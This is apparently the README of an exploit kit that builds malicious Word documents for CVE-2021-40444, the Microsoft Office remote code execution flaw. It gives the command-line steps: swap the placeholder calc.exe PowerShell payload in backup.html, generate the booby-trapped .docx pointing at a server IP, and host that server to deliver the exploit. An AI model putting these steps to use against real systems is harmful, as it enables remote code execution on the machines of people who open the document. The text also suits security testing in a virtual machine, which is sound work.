Malicious docx generator to exploit (Microsoft Office Word Remote Code Execution)
Creation of this Script is based on CVE-2021-40444 PoC by LockedByte and writeup by Tothi
First modify backup.html and replace powershell payload. Right now just pops a calc.exe using IEX('calc.exe').
python3 exploit.py generate http://<SRV IP>
Once you generate the malicious docx (will be at out/) you can setup the server:
sudo python3 exploit.py host 80
Finally try the docx in a Windows Virtual Machine:
